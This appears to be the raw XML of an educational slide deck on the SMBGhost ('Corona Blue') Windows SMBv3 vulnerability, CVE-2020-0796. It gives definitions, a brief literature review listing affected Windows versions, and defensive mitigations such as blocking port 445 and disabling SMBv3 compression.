                <a:effectLst>
                  <a:glow rad="63500">
                    <a:schemeClr val="accent1">
                      <a:satMod val="175000"/>
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                  <a:outerShdw blurRad="50800" dist="38100" algn="l" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="Gill Sans Nova"/>
              </a:rPr>
              <a:t>MITIGATIONS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 1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3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C88892ED-1F55-4A14-BC93-93B199E32B43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1633269" y="1877683"/>
            <a:ext cx="911200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800" dirty="0"/>
              <a:t>Workarounds should be installed on all servers and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>workstations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>we should ensure that firewall rules in the border firewall and endpoints restrict inbound and outbound connections to the vulnerable service (445 TCP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SMBv3 compression should be disabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Block inbound and outbound SMB </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>upgrade our systems and stay in the current flow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04C96AD1-1A75-40C3-AEE9-86EF44FC6786}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4178061" y="5572666"/>
            <a:ext cx="7890294" cy="1214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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>"Act Now on Critical Microsoft SMB Vulnerability (CVE2020-0796)", Nozomi Networks, 2021. [Online]. Available: https://www.nozominetworks.com/blog/actnow-on-criticalmicrosoft-smb-vulnerability-cve-2020- 0796/. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279376261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C117223-2F05-4CE9-B909-F6A9E054A529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2399234" y="2073715"/>
            <a:ext cx="6935759" cy="2993042"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="90000"/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="57150">
              <a:bevelT w="38100" h="38100" prst="angle"/>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="11500" b="1" kern="1200">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg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rPr>
              <a:t>Thank</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="11500" b="1" kern="1200">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg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rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="11500" b="1" kern="1200">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg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Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You!</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54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D69C-13F0-43FA-B369-4F9DD9F717A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="665653"/>
            <a:ext cx="4497743" cy="3566160"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4200">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:ln>
                <a:effectLst>
                  <a:glow rad="101600">
                    <a:schemeClr val="accent5">
                      <a:satMod val="175000"/>
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                  <a:outerShdw blurRad="50800" dist="38100" dir="18900000" algn="bl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                  <a:reflection blurRad="6350" stA="50000" endA="300" endPos="50000" dist="29997" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>INTRODUCTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A07F6D-D238-47FA-9C18-A3D1C987772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275" r="1677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FFB73330-0423-429F-945A-C5B1EED1AB22}"/>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si-LK" sz="700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" tooltip="https://www.privateinternetaccess.com/blog/2018/07/performing-ethical-hacking-through-a-vpn-service-for-a-full-attack-simulation/">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>This Photo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="si-LK" sz="700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> by Unknown Author is licensed under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="si-LK"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si-LK" sz="700">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121987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PU with binary numbers and blueprint">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{391CA9DF-413A-4E8A-B365-C0A5BB612D6F}"/>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EC764B62-98BF-425E-8CFF-796FA5F87E72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="813295"/>
            <a:ext cx="9144000" cy="1098395"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What is Corona Blue ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13F28D34-D4DB-4B29-A080-C9B6D561158E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="2737252"/>
            <a:ext cx="9144000" cy="1098395"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A vulnerability which can let an attacker to intrude your windows computer by exploiting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31245079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AB748-5B7A-4F83-A23A-CCBB1F13950B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1102368" y="694268"/>
            <a:ext cx="3553510" cy="5477932"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What is a Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39"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41" name="Freeform: Shape 19">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42" name="Freeform: Shape 20">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3"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175E155-304B-4BDC-AF55-05B58D0408D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6284861" y="2337731"/>
            <a:ext cx="5217173" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A flaw or weaknesses in a system’s design, implementation, or operation and management that could be exploited to violate the system’s security policy. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223666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B906-9513-4681-9649-19E4E25C78E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="801098" y="1396289"/>
            <a:ext cx="5277333" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What is an Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD2364-A6D9-4014-91DD-2C72B369CFF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805543" y="2871982"/>
            <a:ext cx="5272888" cy="3181684"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unintended or unanticipated behavior for something electronic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploit as a verb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>– Making use of a vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="1800">
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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6" descr="Bug under Magnifying Glass">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5865477C-7C2C-4736-87DF-1CC6534E4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17572499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lurred public library with bookshelves">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46066DE0-A760-4AC2-A66C-D39E33697295}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="50000"/>
          </a:blip>
          <a:srcRect t="1310" b="14420"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="1"/>
            <a:ext cx="12191980" cy="6857999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2257BBFD-FF10-4EB9-B8D1-1868C22A4B31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387349" y="1200152"/>
            <a:ext cx="6897171" cy="4457696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="57150">
              <a:bevelT w="38100" h="38100" prst="slope"/>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="10800000" algn="r" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Literature Review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1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0368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lurred public library with bookshelves">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46066DE0-A760-4AC2-A66C-D39E33697295}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="50000"/>
          </a:blip>
          <a:srcRect t="1310" b="14420"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191980" cy="6857999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2257BBFD-FF10-4EB9-B8D1-1868C22A4B31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419198" y="510039"/>
            <a:ext cx="6379587" cy="1194036"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="57150">
              <a:bevelT w="38100" h="38100" prst="slope"/>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="10800000" algn="r" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="Gill Sans Nova"/>
              </a:rPr>
              <a:t>Literature Review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1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87EC24-649B-4576-BA83-38CDEE1C4279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4350589" y="1820174"/>
            <a:ext cx="714267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t>This CVE-2020-0796 vulnerability was made public in March of 2020.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>This is a remote execution vulnerability that affects Microsoft Server message Block 3.11(SMBv3), and it has a CVSS:3.0 score of 10.0.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The Vulnerability was Discovered by Zecops Research Team and was allotted CVE on 4/11/2019</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The following are the versions of Windows that are impacted by this vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>• Windows 10 v1903</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>                       • Windows 10 v1909 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>                       • Windows Server v1903</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>                       • Windows Server v1909</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Safe. Security, 2021. [Online]. Available: https://www.safe.security/assets/img/researchpaper/SMB Ghost-CVE-2020-0796.pdf.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18678571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lurred public library with bookshelves">
            <a:extLst>
